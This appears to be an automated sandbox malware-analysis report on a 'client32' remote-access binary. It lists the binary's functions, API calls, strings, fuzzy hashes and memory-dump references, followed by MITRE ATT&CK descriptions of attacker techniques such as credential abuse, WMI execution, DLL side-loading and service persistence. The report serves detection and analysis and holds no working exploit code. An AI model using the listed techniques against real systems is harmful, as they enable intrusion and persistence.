Instruction Fuzzy Hash: E8E01AB6610269AFD714DE85EC80EE7B3ACAB48394F008529FA5997240D6B0E850C7A1

Function 11001040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 11001073

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

m_hWnd, xrefs: 11001056
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 819365019-2830328467
Opcode ID: 5b6f476cc93a9633c3a6159f35e46b85fee672744c1b1e919321296da08586a8
Instruction ID: e7bce8408ea30af22c7c9e37b02a909a2b8969894a90aa5e32a2545df5535445
Opcode Fuzzy Hash: 5b6f476cc93a9633c3a6159f35e46b85fee672744c1b1e919321296da08586a8
Instruction Fuzzy Hash: 81E086B5A00359BFD700DE45DC85FD7B3ACEF44365F008429F95987240D6B0E890C7A1

Function 110010D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(?,?,?,?), ref: 11001103

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

m_hWnd, xrefs: 110010E6
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastPostProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 906220102-2830328467
Opcode ID: b3cb18a41463c206cc406075c70f665bc7ecc2607e61aa3ee61cd031c9f1f6d5
Instruction ID: e8cba8ffff57b5e02d8c13f01095ebfd5696fc597b67c93168e51ef10c66d1f9
Opcode Fuzzy Hash: b3cb18a41463c206cc406075c70f665bc7ecc2607e61aa3ee61cd031c9f1f6d5
Instruction Fuzzy Hash: 88E086B5A0021DBFD710DE45DC85FD7B3ACEB48364F008429FA1487200D6B0F950C7A0

Function 1101D040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

MapWindowPoints.USER32(00000000,?,?,00000001), ref: 1101D06F

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

m_hWnd, xrefs: 1101D056
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D051

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessagePointsProcessWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2663631564-2830328467
Opcode ID: ee724e8942f8ccb687fb29726a928492ae95f6a47c3d9234c7dd78e74dcde95c
Instruction ID: 047a39b9cd929562b8eddd567743981104e2151187dbf3fa623269754fda25f5
Opcode Fuzzy Hash: ee724e8942f8ccb687fb29726a928492ae95f6a47c3d9234c7dd78e74dcde95c
Instruction Fuzzy Hash: EBE0C2B1640319BBD210DA41EC86FE6B39C8B00765F008039F61856180D5B0A88083A1

Function 11001110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 1100113B

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

m_hWnd, xrefs: 11001126
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessShowWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1604732272-2830328467
Opcode ID: b169394deedd142a8e8174df693b9a7893e6ea24fb8ac344e85c6e7a2fe1568e
Instruction ID: eb1b349d9615b20d52bafe371294ef1adc3cd52a0bcae2a7193b00229b09bde6
Opcode Fuzzy Hash: b169394deedd142a8e8174df693b9a7893e6ea24fb8ac344e85c6e7a2fe1568e
Instruction Fuzzy Hash: E8D05EB6A1032DABD314DA56EC81FD6F3AC9B143A8F04843AFA6952240D671E990C7A5

Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,?), ref: 1100102B

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

m_hWnd, xrefs: 11001016
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitKillLastMessageProcessTimerwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2229609774-2830328467
Opcode ID: 7731513588f2987bb0f7e64506c67d34eb0e05a2440d66f3ae8dc3417c7bbca5
Instruction ID: 80bf556fc84983a6a784d5f1d7ace7c4401a69b77ebae34e64854dc5975faffe
Opcode Fuzzy Hash: 7731513588f2987bb0f7e64506c67d34eb0e05a2440d66f3ae8dc3417c7bbca5
Instruction Fuzzy Hash: 02D05BB661032DABD310D655DC45FD6B3DCDB04364F048439FA5557140D675E480C795

Function 1100D4B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(1100D72E,?,00000000,?,1100CA5A,?), ref: 1100D4B9
LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CA5A,?), ref: 1100D4C8

Strings

AudioCapture.dll, xrefs: 1100D4C3

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoadVersion
String ID: AudioCapture.dll
API String ID: 3209957514-2642820777
Opcode ID: ccb60dbc698bec3980d8afa3135ffed75df645bcaeae0c68a550dbb1b145da88
Instruction ID: 6a84e9021d2ddcc589f151d869c28ce1384983cebfb69cb912404c0d9479359f
Opcode Fuzzy Hash: ccb60dbc698bec3980d8afa3135ffed75df645bcaeae0c68a550dbb1b145da88
Instruction Fuzzy Hash: 9EE01734E002A79BF712AFB68C4838D77D0B740689FC284B0E922C0548FB6898408B32

Function 11131530 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(?,00000001,?,11049176), ref: 11131556

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

m_hWnd, xrefs: 11131543
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1113153E

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitKillLastMessageProcessTimerwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2229609774-2830328467
Opcode ID: 7efd9d1261173574f092f6922ac4b9c3cae087aef3d2d8ccc434113dad19d795
Instruction ID: 4e4068368be341be744d48811b36ef1e60cbffd5d57875ac04b16495fcb04296
Opcode Fuzzy Hash: 7efd9d1261173574f092f6922ac4b9c3cae087aef3d2d8ccc434113dad19d795
Instruction Fuzzy Hash: 42D0A775A103659FD7209625EC85FC1B3E81F05318F044429F656671C4D2B4A4C08755

Function 1110F500 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1110F50A
SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 1110F520

Strings

MSOfficeWClass, xrefs: 1110F505

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FindMessageSendWindow
String ID: MSOfficeWClass
API String ID: 1741975844-970895155
Opcode ID: 46a31d99fe000439b4b4e092a37f9d4b23f4ea2592be8fdcc0636b8b1ee6b48e
Instruction ID: 81a9ee7ca07fcbc269bd923ada5a9215bbe092865d423690373207611138517c
Opcode Fuzzy Hash: 46a31d99fe000439b4b4e092a37f9d4b23f4ea2592be8fdcc0636b8b1ee6b48e
Instruction Fuzzy Hash: C9D0127475035977E7001AA1DC4AF99FB6CDB85B55F108024F7059A0C1DBB1F440876A

Function 1101D010 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 1101D034

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

m_hWnd, xrefs: 1101D023
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D01E

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMenuMessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1590435379-2830328467
Opcode ID: 5bd23d1dd7980658311e7018b90eacaca5f0859d9f29dfbf23970d11bb3c9e49
Instruction ID: be16c6ed80d1fcc6130c6cf6e9c8d4560682e5ed8d3d25c7b400d1e10b8b5983
Opcode Fuzzy Hash: 5bd23d1dd7980658311e7018b90eacaca5f0859d9f29dfbf23970d11bb3c9e49
Instruction Fuzzy Hash: B5D022B1E0023AAFC310EA51EC88FC6B2A86B00258F044469F12062000E278E480C380

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

